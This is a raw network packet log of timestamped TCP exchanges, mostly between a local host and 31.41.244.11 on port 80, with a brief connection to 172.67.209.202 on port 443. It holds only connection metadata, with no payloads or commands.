Dec 22, 2024 02:16:30.369281054 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.369326115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.370274067 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.370321989 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.370410919 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.370454073 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.371407986 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.371453047 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.371545076 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.371598005 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.372606993 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.372643948 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.372656107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.372687101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.373672009 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.373728037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.373801947 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.373852015 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.374803066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.374855042 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.374882936 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.374948978 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.375891924 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.375951052 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.376003981 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.376061916 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.377005100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.377054930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.377140045 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.377187014 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.378144979 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.378194094 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.378206015 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.378252983 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.379249096 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.379293919 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.379374981 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.379430056 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.380363941 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.380414963 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.380474091 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.380516052 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.381464958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.381516933 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.381598949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.381648064 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.382610083 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.382659912 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.382718086 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.382762909 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.383706093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.383765936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.383847952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.383899927 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.384860992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.384902954 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.384958029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.385010958 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.385941982 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.385998964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.386046886 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.386121988 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.387022018 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:30.387048960 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:30.387064934 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.387110949 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:30.387137890 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.387203932 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.387243032 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.387448072 CET	49814	443	192.168.2.4	172.67.209.202
Dec 22, 2024 02:16:30.387465000 CET	443	49814	172.67.209.202	192.168.2.4
Dec 22, 2024 02:16:30.388166904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.388227940 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.388297081 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.388370037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.389437914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.389476061 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.389488935 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.389516115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.390460014 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.390508890 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.390528917 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.390575886 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.391580105 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.391613960 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.391625881 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.391664028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.392630100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.392673969 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.392755985 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.392802000 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.393815994 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.393870115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.393929958 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.394004107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.395009995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.395049095 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.395061016 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.395114899 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.395998001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.396043062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.396080971 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.396123886 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.397114992 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.397157907 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.397228003 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.397270918 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.398200035 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.398247004 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.398303032 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.398353100 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.399348021 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.399400949 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.399463892 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.399508953 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.400495052 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.400543928 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.400561094 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.400602102 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.401595116 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.401648045 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.401706934 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.401751041 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.402735949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.402781010 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.402832031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.402875900 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.403826952 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.403872967 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.403928995 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.403968096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.404941082 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.405000925 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.405042887 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.405083895 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.406058073 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.406100988 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.406157970 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.406197071 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.407174110 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.407221079 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.407274961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.407325029 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.408252001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.408297062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.542200089 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.542308092 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.542349100 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.542423964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.542423964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.542423964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.542525053 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.542577028 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.543502092 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.543555021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.543586016 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.543631077 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.544594049 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.544667959 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.544734955 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.544786930 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.545698881 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.545752048 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.545814991 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.545865059 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.546806097 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.546905994 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.546969891 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.547017097 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.547962904 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.548018932 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.548105001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.548154116 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.549144030 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.549180031 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.549196959 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.549223900 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.550224066 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.550282955 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.550328970 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.550375938 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.551414013 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.551450968 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.551466942 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.551482916 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.552455902 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.552510023 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.552602053 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.552647114 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.553504944 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.553554058 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.553611994 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.553654909 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.554661036 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.554717064 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.554759026 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.554799080 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.555788040 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.555826902 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.555841923 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.555885077 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.556968927 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.557023048 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.557050943 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.557101011 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.558017969 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.558072090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.558161974 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.558212042 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.559170008 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.559222937 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.559268951 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.559307098 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.560256004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.560318947 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.560340881 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.560393095 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.561347961 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.561405897 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.561486959 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.561532021 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.562465906 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.562524080 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.562618017 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.562660933 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.563597918 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.563656092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.563700914 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.563749075 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.564685106 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.564743042 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.564810991 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.564858913 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.565840006 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.565890074 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.565913916 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.565962076 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.575675011 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.575726986 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.575771093 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.575908899 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.575944901 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.575962067 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.575978041 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576013088 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576143980 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576179028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576208115 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576215982 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576253891 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576276064 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576340914 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576667070 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576703072 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576726913 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576738119 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576776028 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576791048 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576812029 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576848030 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576853037 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576885939 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.576924086 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.576984882 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.577541113 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.577577114 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.577609062 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.577615023 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.577673912 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.577848911 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.577884912 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.577912092 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.577974081 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.578258991 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.578331947 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.578381062 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.578437090 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.581630945 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.581666946 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.581688881 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.581702948 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.581715107 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.581746101 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.581887007 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.581923962 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.581933975 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.581960917 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.581968069 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.582003117 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.582932949 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.582976103 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.582989931 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.583033085 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.583724976 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.583769083 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.583838940 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.583879948 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.584867001 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.584913969 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.584978104 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.585022926 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.585918903 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.585973024 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.586088896 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.586131096 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.587068081 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.587126970 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.587172985 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.587255955 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.588150978 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.588205099 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.588273048 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.588315964 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.589365005 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.589416981 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.589421988 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.589468002 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.590394020 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.590451002 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.590536118 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.590580940 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.591546059 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.591598988 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.591645956 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.591691017 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.592684984 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.592732906 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.592784882 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.592844963 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.593972921 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.594008923 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.594018936 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.594049931 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.595015049 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.595052004 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.595062971 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.595093966 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.596013069 CET	80	49804	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:30.596111059 CET	49804	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:30.596146107 CET	80	49804	31.41.244.11	192.168.2.4
